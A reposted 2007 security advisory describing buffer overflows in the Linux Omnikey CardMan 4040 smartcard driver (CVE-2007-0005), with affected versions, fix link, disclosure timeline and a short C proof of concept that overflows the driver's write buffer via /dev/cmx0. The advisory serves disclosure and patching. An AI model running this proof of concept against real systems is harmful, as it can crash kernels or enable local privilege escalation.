‘Omnikey CardMan 4040 Linux Drivers Buffer Overflow’

Summary

The Linux drivers for the Omnikey CardMan 4040 smartcard reader contain a buffer overflow vulnerability. Local attackers with direct or indirect write permissions to a cmx device file can execute arbitrary code with kernel privileges or may cause denial of service.’

Credit:

‘The information has been provided by Daniel Roethlisberger.’


Details

Vulnerable Systems:
 * Linux 2.4/2.6 cm4040 drivers by Omnikey:
   – cm4040 version 1.1.0
   – cm4040 version 1.2.0
   – cm4040 version 2.0.0
 * Linux 2.6 cm4040 drivers by Harald Welte, as included in:
   – Linux version 2.6.15 up to version 2.6.20.1

Immune Systems:
 * Linux 2.4/2.6 cm4040 drivers by Omnikey:
   – cm4040 version 1.0.0
 * FreeBSD cmx driver by Daniel Roethlisberger

While using the Linux drivers for the CM4040 as a reference for writing a cmx FreeBSD driver, Compass Security has discovered two buffer overflows in the Linux drivers. One of them in the write() and another one in the read() handler.

When calling write() with a buffer larger than 512 bytes, the driver’s write buffer overflows, allowing to overwrite the EIP and execute arbitrary code with kernel privileges.

In the read() handler, there is a similar problem with data originating in the device. A malicious or buggy device sending more than 512 bytes can overflow the driver’s read buffer to the same effect.

Of course, the write() vulnerability is only exploitable by users with direct or indirect write access to the cmx device special file. By default, direct access is limited to root. Therefore, one might think this is not an issue. However, unprivileged users may cause large indirect writes via userland daemons such as those provided by pcsc-lite or openct. Since ‘normal’ APDUs are smaller than 512 bytes, this may not be an issue, but I haven’t looked into the various ways to cause data to be written indirectly.

Furthermore, a system can be set up to allow access to the device for a special user or group in order to increase security by running the userland drivers without root privileges. In such a setup users with access to the device can escalate privileges or cause DoS.

Proof of concept:
/*
 * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
 * Copyright (C) Daniel Roethlisberger <daniel.roethlisberger@csnc.ch>
 * Compass Security Network Computing AG, Rapperswil, Switzerland.
 * All rights reserved.
 * http://www.csnc.ch/
 */

#include<sys/stat.h>
#include<fcntl.h>
#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<errno.h>

int main(int argc, char *argv[]) {
    int fd, i, n;
    char buf[8192];

    /*
     * 0 1 2 3 4 5 6 7 8 9 a b c d e f …
     * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 …
     */
    for (i = 0; i < sizeof(buf); i += 2) {
        buf[i] = (char)(((i/2) & 0xFF00) >> 8);
        buf[i+1] = (char) ((i/2) & 0x00FF);
    }

    if ((fd = open(‘/dev/cmx0’, O_RDWR)) < 0) {
        printf(‘Error: open() => %sn’, strerror(errno));
        exit(errno);
    }
    if ((n = write(fd, buf, sizeof(buf))) < 0) {
        printf(‘Error: write() => %sn’, strerror(errno));
        exit(errno);
    }
    printf(‘%d of %d bytes writtenn’, n, sizeof(buf));
    exit(0);
}

Fix:
http://lkml.org/lkml/2007/3/6/386

Vendor Status:
Linux 2.6.21-rc3 contains the patch. Omnikey will fix it in their next driver release.

Disclosure Timeline:
 * Vendor Notified: 2007-02-05 (Harald Welte), 2007-02-06 (vendor-sec, Omnikey)
 * Vendor Response: Will fix (Harald Welte, vendor-sec), Will fix but not coordinate release schedule (Omnikey)
 * Embargo Until: 2007-03-06

CVE Information:
CVE-2007-0005

Categories: UNIX